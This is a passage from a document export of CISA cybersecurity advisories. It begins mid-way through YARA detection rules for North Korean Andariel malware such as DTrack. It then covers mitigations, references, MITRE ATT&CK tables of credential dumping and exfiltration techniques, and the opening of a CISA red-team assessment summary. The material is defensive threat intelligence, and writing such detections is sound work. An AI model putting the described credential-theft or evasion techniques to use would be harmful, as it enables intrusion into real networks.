8b4104 } // n = 4, score = 200 // 4881ec90050000 | test eax, eax // 8b01 | jns 0x16 // 8985c8040000 | dec eax // 8b4104 | mov eax, dword ptr [ecx]</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$sequence_3 = { 488b01 ff10 488b4f08 4c8d4c2430 } // n = 4, score = 200 // 488b01 | mov edx, esi // ff10 | dec eax // 488b4f08 | mov ecx, ebx // 4c8d4c2430 | inc ecx</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$sequence_4 = { 488b01 ff10 488b4e18 488b01 } // n = 4, score = 200 // 488b01 | dec eax // ff10 | cmp dword ptr [ecx + 0x18], 0x10 // 488b4e18 | dec eax // 488b01 | sub esp, 0x590</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$sequence_5 = { 4881eca0000000 33c0 488bd9 488d4c2432 } // n = 4, score = 200 // 4881eca0000000 | mov eax, dword ptr [ecx] // 33c0 | mov dword ptr [ebp + 0x4c8], eax // 488bd9 | mov eax, dword ptr [ecx + 4] // 488d4c2432 | mov dword ptr [ebp + 0x4d0], eax</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$sequence_6 = { 488b01 eb03 488bc1 0fb600 } // n = 4, score = 200 // 488b01 | inc ecx // eb03 | mov ebx, dword ptr [ebp + ebp] // 488bc1 | inc ecx // 0fb600 | movups xmmword ptr [edi], xmm0</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$sequence_7 = { 488b01 8b10 895124 448b4124 4585c0 } // n = 5, score = 200 // 488b01 | sub esp, 0x30 // 8b10 | dec ecx // 895124 | mov ebx, eax // 448b4124 | dec eax // 4585c0 | mov ecx, eax</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$sequence_8 = { 4c8d0d31eb0000 c1e918 c1e808 41bf00000080 } // n = 4, score = 100 // 4c8d0d31eb0000 | jne 0x1e6 // c1e918 | dec eax // c1e808 | lea ecx, [0xbda0] // 41bf00000080 | dec esp</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$sequence_9 = { 488bd8 4885c0 752d ff15???????? 83f857 0f85e0010000 488d0da0bd0000 } // n = 7, score = 100 // 488bd8 | dec eax // 4885c0 | mov ebx, eax // 752d | dec eax // ff15???????? | // 83f857 | test eax, eax // 0f85e0010000 | jne 0x2f // 488d0da0bd0000 | cmp eax, 0x57</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$sequence_10 = { 75d4 488d1d7f6c0100 488b4bf8 4885c9 740b } // n = 5, score = 100 // 75d4 | lea ecx, [0xeb31] // 488d1d7f6c0100 | shr ecx, 0x18 // 488b4bf8 | shr eax, 8 // 4885c9 | inc ecx // 740b | mov edi, 0x80000000</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$sequence_11 = { 0f85d9000000 488d15d0c90000 41b810200100 488bcd e8???????? eb6b b9f4ffffff } // n = 7, score = 100 // 0f85d9000000 | jne 0xffffffd6 // 488d15d0c90000 | dec eax // 41b810200100 | lea ebx, [0x16c7f] // 488bcd | dec eax // e8???????? | // eb6b | mov ecx, dword ptr [ebx - 8] // b9f4ffffff | dec eax</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$sequence_12 = { 48890d???????? 488905???????? 488d05ae610000 488905???????? 488d05a0550000 488905???????? } // n = 6, score = 100 // 48890d???????? | // 488905???????? | // 488d05ae610000 | test ecx, ecx // 488905???????? | // 488d05a0550000 | je 0x10 // 488905???????? |</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$sequence_13 = { 8bcf e8???????? 488b7c2448 85c0 0f8440030000 488d0560250100 } // n = 6, score = 100 // 8bcf | mov eax, 0x12010 // e8???????? | // 488b7c2448 | dec eax // 85c0 | mov ecx, ebp // 0f8440030000 | jmp 0x83 // 488d0560250100 | mov ecx, 0xfffffff4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$sequence_14 = { ff15???????? 8b05???????? 2305???????? ba02000000 33c9 8905???????? 8b05???????? } // n = 7, score = 100 // ff15???????? | // 8b05???????? | // 2305???????? | // ba02000000 | dec eax // 33c9 | lea eax, [0x61ae] // 8905???????? | // 8b05???????? |</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$sequence_15 = { 4883ec30 498bd8 e8???????? 488bc8 4885c0 } // n = 5, score = 100 // 4883ec30 | jne 0xdf // 498bd8 | dec eax // e8???????? | // 488bc8 | lea edx, [0xc9d0] // 4885c0 | inc ecx</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condition: 7 of them and filesize &lt; 557056 } rule win_dtrack_auto { strings: $sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 } // n = 7, score = 400 // 52 | push edx // 8b4508 | mov eax, dword ptr [ebp + 8] // 50 | push eax // e8???????? | // 83c414 | add esp, 0x14 // 8b4d10 | mov ecx, dword ptr [ebp + 0x10] // 51 | push ecx</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$sequence_1 = { 3a4101 7523 83854cf6ffff02 838550f6ffff02 80bd4af6ffff00 75ae c78544f6ffff00000000 } // n = 7, score = 300 // 3a4101 | cmp al, byte ptr [ecx + 1] // 7523 | jne 0x25 // 83854cf6ffff02 | add dword ptr [ebp - 0x9b4], 2 // 838550f6ffff02 | add dword ptr [ebp - 0x9b0], 2 // 80bd4af6ffff00 | cmp byte ptr [ebp - 0x9b6], 0 // 75ae | jne 0xffffffb0 // c78544f6ffff00000000 | mov dword ptr [ebp - 0x9bc], 0</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$sequence_2 = { 50 ff15???????? a3???????? 68???????? e8???????? 83c404 50 } // n = 7, score = 300 // 50 | push eax // ff15???????? | // a3???????? | // 68???????? | // e8???????? | // 83c404 | add esp, 4 // 50 | push eax</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$sequence_3 = { 8d8dd4faffff 51 e8???????? 83c408 8b15???????? } // n = 5, score = 300 // 8d8dd4faffff | lea ecx, [ebp - 0x52c] // 51 | push ecx // e8???????? | // 83c408 | add esp, 8 // 8b15???????? |</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$sequence_4 = { 8855f5 6a5c 8b450c 50 e8???????? } // n = 5, score = 300 // 8855f5 | mov byte ptr [ebp - 0xb], dl // 6a5c | push 0x5c // 8b450c | mov eax, dword ptr [ebp + 0xc] // 50 | push eax // e8???????? |</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$sequence_5 = { 51 e8???????? 83c410 8b558c 52 } // n = 5, score = 300 // 51 | push ecx // e8???????? | // 83c410 | add esp, 0x10 // 8b558c | mov edx, dword ptr [ebp - 0x74] // 52 | push edx</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$sequence_6 = { 8b4d0c 51 68???????? 8d9560eaffff 52 e8???????? } // n = 6, score = 300 // 8b4d0c | mov ecx, dword ptr [ebp + 0xc] // 51 | push ecx // 68???????? | // 8d9560eaffff | lea edx, [ebp - 0x15a0] // 52 | push edx // e8???????? |</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$sequence_7 = { 83c001 8945f4 837df420 7d2c 8b4df8 } // n = 5, score = 300 // 83c001 | add eax, 1 // 8945f4 | mov dword ptr [ebp - 0xc], eax // 837df420 | cmp dword ptr [ebp - 0xc], 0x20 // 7d2c | jge 0x2e // 8b4df8 | mov ecx, dword ptr [ebp - 8]</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$sequence_8 = { 83c001 89856cf6ffff 8b8d70f6ffff 8a11 } // n = 4, score = 300 // 83c001 | add eax, 1 // 89856cf6ffff | mov dword ptr [ebp - 0x994], eax // 8b8d70f6ffff | mov ecx, dword ptr [ebp - 0x990] // 8a11 | mov dl, byte ptr [ecx]</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$sequence_9 = { 0355f0 0fb602 0fb64df7 33c1 0fb655fc 33c2 } // n = 6, score = 200 // 0355f0 | add edx, dword ptr [ebp - 0x10] // 0fb602 | movzx eax, byte ptr [edx] // 0fb64df7 | movzx ecx, byte ptr [ebp - 9] // 33c1 | xor eax, ecx // 0fb655fc | movzx edx, byte ptr [ebp - 4] // 33c2 | xor eax, edx</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$sequence_10 = { d1e9 894df8 8b5518 8955fc c745f000000000 } // n = 5, score = 200 // d1e9 | shr ecx, 1 // 894df8 | mov dword ptr [ebp - 8], ecx // 8b5518 | mov edx, dword ptr [ebp + 0x18] // 8955fc | mov dword ptr [ebp - 4], edx // c745f000000000 | mov dword ptr [ebp - 0x10], 0</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$sequence_11 = { 8b4df0 3b4d10 0f8d90000000 8b5508 0355f0 0fb602 } // n = 6, score = 200 // 8b4df0 | mov ecx, dword ptr [ebp - 0x10] // 3b4d10 | cmp ecx, dword ptr [ebp + 0x10] // 0f8d90000000 | jge 0x96 // 8b5508 | mov edx, dword ptr [ebp + 8] // 0355f0 | add edx, dword ptr [ebp - 0x10] // 0fb602 | movzx eax, byte ptr [edx]</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$sequence_12 = { 894d14 8b45f8 c1e018 8b4dfc c1e908 0bc1 } // n = 6, score = 200 // 894d14 | mov dword ptr [ebp + 0x14], ecx // 8b45f8 | mov eax, dword ptr [ebp - 8] // c1e018 | shl eax, 0x18 // 8b4dfc | mov ecx, dword ptr [ebp - 4] // c1e908 | shr ecx, 8 // 0bc1 | or eax, ecx</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$sequence_13 = { 0bc1 894518 8b5514 8955f8 } // n = 4, score = 200 // 0bc1 | or eax, ecx // 894518 | mov dword ptr [ebp + 0x18], eax // 8b5514 | mov edx, dword ptr [ebp + 0x14] // 8955f8 | mov dword ptr [ebp - 8], edx</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$sequence_14 = { 8b5514 8955f8 8b4518 8945fc e9???????? 8be5 } // n = 6, score = 200 // 8b5514 | mov edx, dword ptr [ebp + 0x14] // 8955f8 | mov dword ptr [ebp - 8], edx // 8b4518 | mov eax, dword ptr [ebp + 0x18] // 8945fc | mov dword ptr [ebp - 4], eax // e9???????? | // 8be5 | mov esp, ebp</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condition: 7 of them and filesize &lt; 1736704 } Mitigation Measures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authoring agencies recommend implementing the mitigations below to improve your organization's cybersecurity posture based on the threat actors' activity. Log4Shell and Other Log4j Vulnerabilities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Defenders should consult the joint Cybersecurity Advisory titled "Mitigating Log4Shell and Other Log4j-Related Vulnerabilities" and CISA's "Apache Log4j Vulnerability" guidance. Organizations can mitigate the risks posed by the vulnerability by identifying assets affected by Log4Shell and other Log4j-related vulnerabilities and upgrading Log4j assets and affected products to the latest version.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Note: CVE-2021-44228 'Log4Shell' was disclosed in December 2021 and affects the Log4j library prior to version 2.17.0.</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Defenders should remain alert to vendor software updates, and initiate hunt and incident response procedures to detect possible Log4Shell exploitation. Web Shell Malware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Web shell malware is deployed by adversaries on a victim's web server to execute arbitrary system commands. The NSA and Australian Signals Directorate's report titled "Detect and Prevent Web Shell Malware" provides mitigating actions to identify and recover from web shells.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Preventing exploitation of web-facing servers often depends on maintaining an inventory of systems and applications, rapidly applying patches as they are released, putting vulnerable or potentially risky systems behind reverse proxies that require authentication, and deploying and configuring Web Application Firewalls (WAFs). Endpoint Activity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Preventing and detecting further adversary activity should focus on deploying endpoint agents or other monitoring mechanisms, blocking unnecessary outbound connections, blocking external access to administrator panels and services or turning them off entirely, and segmenting the network to prevent lateral movement from a compromised web server to critical assets. Command Line Activity and Remote Access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Monitoring for suspicious command-line activity, implementing multi-factor authentication for remote access services, and properly segmenting and using allow-listing tools for critical assets can protect against malicious activity by RGB 3rd Bureau's Andariel group and other cyber threat actors. Packing</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Signatures for Themida, VMProtect and a number of other packers are available here, however, the signatures will not identify every file packed using these applications.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Check for security vulnerabilities, apply patches, and update to the latest version of software Encrypt all sensitive data including personal information Block access to unused ports Change passwords when they are suspected of being compromised Strengthen the subscriber identity authentication process for leased servers DPRK Rewards for Justice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and ROK Governments encourage victims to report suspicious activities, including those related to suspected DPRK cyber activities, to relevant authorities. If you provide information about illicit DPRK activities in cyberspace, including past or ongoing operations, you may be eligible for a reward. If you have information about illicit DPRK activities in cyberspace, including past or ongoing operations, providing such information through the Department of State's Rewards for Justice program could make you eligible to receive an award of up to $10 million. For further details, please visit https://rewardsforjustice.net/.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Acknowledgements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Mandiant and Microsoft Threat Intelligence contributed to this CSA. Disclaimer of Endorsement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Your organization has no obligation to respond or provide information in response to this product. If, after reviewing the information provided, your organization decides to provide information to the authorizing agencies, it must do so consistent with applicable state and federal law.</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information in this report is being provided "as is" for informational purposes only. The authoring agencies do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or service by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the co-authors. Trademark Recognition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Active Directory(R), Microsoft(R), PowerShell(R), and Windows(R) are registered trademarks of Microsoft Corporation. MITRE(R) and ATT&amp;CK(R) are registered trademarks of The MITRE Corporation. Purpose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document was developed in furtherance of the authoring agencies' cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. Contact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 organizations: Urgently report any anomalous activity or incidents, including based upon technical information associated with this Cybersecurity Advisory, to CISA at Report@cisa.dhs.gov or cisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/fieldoffices.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DC3 Cyber Forensics Laboratory (CFL): afosi.dc3.cflintake@us.af.mil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DoD-Defense Industrial Base (DIB) Collaborative Information Sharing Environment (DCISE): dc3.dcise@us.af.mil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NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov</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NSA Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov</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NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov</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Republic of Korea organizations: If you suspect cyber incidents involving state actors, including Andariel, or discover similar cases, please contact the relevant authorities below.</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National Intelligence Service: www.nis.go.kr, +82 111 References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AhnLab Security Emergency Response Center: https://asec.ahnlab.com/en/56405/ https://asec.ahnlab.com/en/59073/ https://asec.ahnlab.com/en/66088/</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Boredhackerblog: http://www.boredhackerblog.info/2022/11/openssl-100-fipps- linux-backdoor-notes.html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Cisco Talos Intelligence blogs: https://blog.talosintelligence.com/lazarus-three-rats/ https://blog.talosintelligence.com/lazarus-magicrat/ https://blog.talosintelligence.com/lazarus-collectionrat/ https://blog.talosintelligence.com/lazarus-quiterat/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DCSO blog: https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the- case-of-the-curious-c2-dbfe29f57499</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Github.com/ditekshen: https://github.com/ditekshen/detection/blob/master/yara/indicator_packed.yar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JPCERT blogs: https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html https://blogs.jpcert.or.jp/en/2022/07/yamabot.html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Mandiant blogs: https://www.mandiant.com/resources/blog/north-korea-cyber-structure- alignment-2023 https://www.mandiant.com/resources/blog/mapping-dprk-groups-to-government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Microsoft blogs: https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north- korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ https://www.microsoft.com/en-us/security/blog/2022/07/14/north-korean- threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/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NSCS Guidance: Alert: Apache Log4j Vulnerabilities: https://www.ncsc.gov.uk/news/apache- log4j-vulnerability Information: https://www.ncsc.gov.uk/information/log4j-vulnerability-what- everyone-needs-to-know</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Symantec blog: https://symantec-enterprise-blogs.security.com/blogs/threat- intelligence/clasiopa-materials-research</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VMware blog: https://blogs.vmware.com/security/2021/12/tigerrat-advanced- adversaries-on-the-prowl.html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WithSecure Labs report: https://labs.withsecure.com/publications/no- pineapple-dprk-targeting-of-medical-research-and-technology-sector Appendix: MITRE ATT&amp;CK Techniques and Software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tactics and techniques referenced in this advisory are identified in Table 3 - Table 12.</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3. Reconnaissance and Enumeration Technique Title ID Use Gather Victim Org Information T1591 The actors gather information about the victim's organization that can be used during targeting.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Gather Victim Host Information T1592 The actors gather information about the victim's hosts that can be used during targeting.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Active Scanning T1595 The actors execute active reconnaissance scans to gather information that can be used during targeting.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Search Open Technical Databases T1596 The actors search freely available technical databases for information about victims that can be used during targeting.</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4. Resource Development, Tooling, and Remote Access Tools (RATs) Technique Title ID Use OS Credential Dumping T1003 The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Exfiltration Over Alternative Protocol T1048 The actors steal data by exfiltrating it over a different protocol than that of the existing command and control channel.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Proxy T1090 The actors use a connection proxy to direct network traffic between systems or act as intermediary for network communications to a command and control server to avoid direct connections to their infrastructure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Archive Collected Data T1560 The actors compress and/or encrypt data that is collected prior to exfiltration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Protocol Tunneling T1572 The actors tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Develop Capabilities: Malware T1587.001 The actors develop malware and malware components that can be used during targeting.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Develop Capabilities: Exploits T1587.004 The actors develop exploits that can be used during targeting.</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5. Software used for Resource Development, Tooling, and RATs Software Title ID Use Mimikatz S0002 The actors use a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>AdFind S0552 The actors use a free command-line query tool that can be used for gathering information from the Active Directory.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6. Initial Access Technique Title ID Use Exploit Public-Facing Application T1190 The actors attempt to exploit a weakness in an Internet-facing host or system to initially access a network.</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7. Execution Technique Title ID Use Command and Scripting Interpreter T1059 The actors abuse command and script interpreters to execute commands, scripts, or binaries.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8. Defense Evasion Technique Title ID Use Obfuscated Files or Information T1027 The actors attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its content on the system or in transit.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9. Credential Access Technique Title ID Use OS Credential Dumping T1003 The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.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10. Discovery and Lateral Movement Technique Title ID Use Remote Services T1021 The actors use valid accounts to log into a service that accepts remote connections, such as telnet, SSH, and VNC.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Remote Services: SMB/Windows Admin Shares T1021.002 The actors use valid accounts to interact with a remote network share using Server Message Block (SMB).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>File and Directory Discovery T1083 The actors enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Account Discovery T1087 The actors attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment.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11. Command and Control Technique Title ID Use Application Layer Protocol T1071 The actors establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, telnet, DNP3, and Modbus.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Proxy T1090 The actors use a connection proxy to direct network traffic between systems or act as an intermediary for network communications.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12. Collection and Exfiltration Technique Title ID Use Data from Network Shared Drive T1039 The actors search network shares on computers they have compromised to find files of interest.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Exfiltration Over Alternative Protocol T1048 The actors steal data by exfiltrating it over a different protocol than that of the existing command and control server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Archive Collected Data T1560 The actors compress and/or encrypt data that is collected prior to exfiltration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Exfiltration Over Web Service T1567 The actors use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2024.07.25 20:52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>CISA Red Team's Operations Against a Federal Civilian Executive Branch Organization Highlights the Necessity of Defense-in-Depth</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Release Date July 11, 2024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Alert Code AA24-193A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EXECUTIVE SUMMARY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In early 2023, the Cybersecurity and Infrastructure Security Agency (CISA) conducted a SILENTSHIELD red team assessment against a Federal Civilian Executive Branch (FCEB) organization. During SILENTSHIELD assessments, the red team first performs a no-notice, long-term simulation of nation-state cyber operations. The team mimics the techniques, tradecraft, and behaviors of sophisticated threat actors and measures the potential dwell time actors </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>have on a network, providing a realistic assessment of the organization's security posture. Then, the team works directly with the organization's network defenders, system administrators, and other technical staff to address strengths and weaknesses found during the assessment. The team's goal is to assist the organization with refining their detection, response, and hunt capabilities-particularly hunting unknown threats.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coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory (CSA) detailing the red team's activity and tactics, techniques, and procedures (TTPs); associated network defense activity; and lessons learned to provide network defenders with recommendations for improving their organization's detection capabilities and cyber posture.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During the first phase, the SILENTSHIELD team gained initial access by exploiting a known vulnerability in an unpatched web server in the victim's Solaris enclave. Although the team fully compromised the enclave, they were unable to move into the Windows portion of the network due to a lack of credentials. In a parallel effort, the team gained access to the Windows network through phishing. They then discovered unsecured administrator credentials, allowing them to pivot freely throughout the Windows environment, which resulted in full domain compromise and access to tier zero assets. The team then identified that the organization had trust relationships with multiple external partner organizations and was able to exploit and pivot to an external organization. The red team remained undetected by network defenders throughout the first phase.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red team's findings underscored the importance of defense-in-depth and using diversified layers of protection. The organization was only able to fully understand the extent of the red team's compromise by running full diagnostics from all data sources. This involved analyzing host-based logs, internal network logs, external (egress) network logs, and authentication logs.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red team's findings also demonstrated the value of using tool-agnostic and behavior-based indicators of compromise (IOCs) and of applying an "allowlist" approach to network behavior and systems, rather than a "denylist" approach, which predominantly results in an unmanageable amount of noise. The red team's findings illuminated the following lessons learned for network defenders about how to reduce and respond to risk: Lesson learned: The assessed organization had insufficient controls to prevent and detect malicious activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Lesson learned: The organization did not effectively or efficiently collect, retain, and analyze logs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Lesson learned: Bureaucratic processes and decentralized teams hindered the organization's network defenders.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Lesson learned: A "known-bad" detection approach hampered detection of alternate TTPs.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 reduce risk of similar malicious cyber activity, CISA encourages organizations to apply the recommendations in the Mitigations section of this advisory, including those listed below: Apply defense-in-depth principles by using multiple layers of security to ensure comprehensive analysis and detection of possible intrusions. Use robust network segmentation to impede lateral movement across the network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Establish baselines of network traffic, application execution, and account authentication. Use these baselines to enforce an "allowlist" philosophy rather than denying known-bad IOCs. Ensure monitoring and detection tools and procedures are primarily behavior-based, rather than IOC-centric.</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CISA recognizes that insecure software contributes to these identified issues and urges software manufacturers to embrace Secure by Design principles and implement the recommendations in the Mitigations section of this CSA, including those listed below, to harden customer networks against malicious activity and reduce the likelihood of domain compromise: Eliminate default passwords.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Provide logging at no additional charge.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
